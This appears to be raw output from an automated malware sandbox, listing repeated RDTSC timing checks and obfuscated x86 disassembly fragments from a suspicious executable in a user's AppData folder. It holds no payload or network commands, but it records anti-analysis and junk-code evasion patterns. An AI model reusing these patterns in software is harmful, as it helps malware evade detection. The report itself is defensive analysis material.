Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8D8 second address: CAD8E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8E6 second address: CAD8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3C9D4 second address: C3C9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E948C9FC9h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C813FE second address: C814C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], ebx 0x00000008 mov ecx, edi 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F0E94F51A48h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b sub di, DF1Bh 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 jmp 00007F0E94F51A56h 0x0000003c mov dword ptr [ebp+1249606Ch], esp 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F0E94F51A48h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c or edx, dword ptr [ebp+122D3966h] 0x00000062 cmp dword ptr [ebp+122D3A7Ah], 00000000h 0x00000069 jne 00007F0E94F51B3Ch 0x0000006f mov byte ptr [ebp+122D1CCBh], 00000047h 0x00000076 jc 00007F0E94F51A4Bh 0x0000007c mov edi, 0105AA21h 0x00000081 mov eax, D49AA7D2h 0x00000086 call 00007F0E94F51A4Fh 0x0000008b mov dword ptr [ebp+122D1C3Ch], ecx 0x00000091 pop edx 0x00000092 nop 0x00000093 push eax 0x00000094 push edx 0x00000095 jne 00007F0E94F51A48h 0x0000009b pushad 0x0000009c popad 0x0000009d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C81BF9 second address: C81BFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C81BFF second address: C81C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C820A1 second address: C820C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F0E948C9FC1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007F0E948C9FB6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C820C7 second address: C820D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C820D6 second address: C820DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C82520 second address: C82524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C82524 second address: C8252A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8252A second address: C82534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C825BD second address: C825C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C825C1 second address: C8268A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0E94F51A5Fh 0x0000000c jmp 00007F0E94F51A59h 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F0E94F51A48h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov ecx, dword ptr [ebp+12482FD4h] 0x00000033 lea eax, dword ptr [ebp+12496058h] 0x00000039 jnl 00007F0E94F51A60h 0x0000003f nop 0x00000040 pushad 0x00000041 push eax 0x00000042 jmp 00007F0E94F51A59h 0x00000047 pop eax 0x00000048 jc 00007F0E94F51A48h 0x0000004e push edi 0x0000004f pop edi 0x00000050 popad 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 jmp 00007F0E94F51A55h 0x00000059 jl 00007F0E94F51A46h 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F0E94F51A52h 0x00000067 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8268A second address: C826EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F0E948C9FB8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D235Ch], edi 0x00000028 lea eax, dword ptr [ebp+12496014h] 0x0000002e mov edx, dword ptr [ebp+122D38F2h] 0x00000034 nop 0x00000035 ja 00007F0E948C9FD3h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C826EA second address: C826EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA897 second address: CBA8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8A0 second address: CBA8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8AA second address: CBA8B4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E948C9FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8B4 second address: CBA8BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8BC second address: CBA8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8C0 second address: CBA8F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0E94F51A58h 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 ja 00007F0E94F51A4Ah 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F0E94F51A46h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC10DD second address: CC10EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC10EE second address: CC10FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFAB3 second address: CBFAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F0E948C9FB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFAC5 second address: CBFAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFAD0 second address: CBFAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F0E948C9FB6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F0E948C9FBCh 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFAEB second address: CBFB03 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E94F51A4Eh 0x00000008 jp 00007F0E94F51A4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFF5C second address: CBFF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFF62 second address: CBFF8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0E94F51A52h 0x0000000f jnc 00007F0E94F51A46h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC0235 second address: CC023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC04E1 second address: CC0503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c jng 00007F0E94F51A46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC0503 second address: CC0509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC0AA0 second address: CC0AAA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6BFA second address: CC6C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0E948C9FB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6C04 second address: CC6C53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 jns 00007F0E94F51A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F0E94F51A4Eh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop eax 0x00000018 pop ebx 0x00000019 push ebx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F0E94F51A4Dh 0x00000022 jng 00007F0E94F51A46h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC59F2 second address: CC59F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC59F6 second address: CC59FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC59FF second address: CC5A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B52 second address: CC5B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F0E94F51A46h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B60 second address: CC5B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B64 second address: CC5B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B6E second address: CC5B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B74 second address: CC5B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B78 second address: CC5B86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B86 second address: CC5B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5E4A second address: CC5E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FBFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5FAB second address: CC5FB9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0E94F51A48h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6412 second address: CC6422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F0E948C9FB6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6422 second address: CC6427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6427 second address: CC6431 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E948C9FC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6431 second address: CC6446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0E94F51A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6446 second address: CC644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC68F7 second address: CC68FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC9443 second address: CC9453 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E948C9FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC95C5 second address: CC95D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F0E94F51A4Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC95D7 second address: CC9633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E948C9FC8h 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0E948C9FC4h 0x00000018 pushad 0x00000019 jmp 00007F0E948C9FC8h 0x0000001e je 00007F0E948C9FB6h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC9633 second address: CC9638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC9638 second address: CC9653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E948C9FC3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC9653 second address: CC965C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCC012 second address: CCC016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFDF4 second address: CCFDF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFDF8 second address: CCFDFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFDFC second address: CCFE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE02 second address: CCFE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F0E948C9FE4h 0x0000000c jmp 00007F0E948C9FC9h 0x00000011 jmp 00007F0E948C9FC5h 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE3C second address: CCFE41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE41 second address: CCFE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE49 second address: CCFE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F0E94F51A71h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE85 second address: CCFE8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE8B second address: CCFE91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCF507 second address: CCF50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCF50B second address: CCF51B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F0E94F51A4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD4206 second address: CD420A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD4361 second address: CD4383 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E94F51A56h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD44EE second address: CD44F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD44F2 second address: CD4520 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F0E94F51A50h 0x00000010 jnp 00007F0E94F51A62h 0x00000016 ja 00007F0E94F51A52h 0x0000001c jne 00007F0E94F51A46h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD4687 second address: CD468D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD468D second address: CD46B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edi 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F0E94F51A59h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD47E4 second address: CD4815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC6h 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push eax 0x00000011 jng 00007F0E948C9FB8h 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C81E74 second address: C81E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
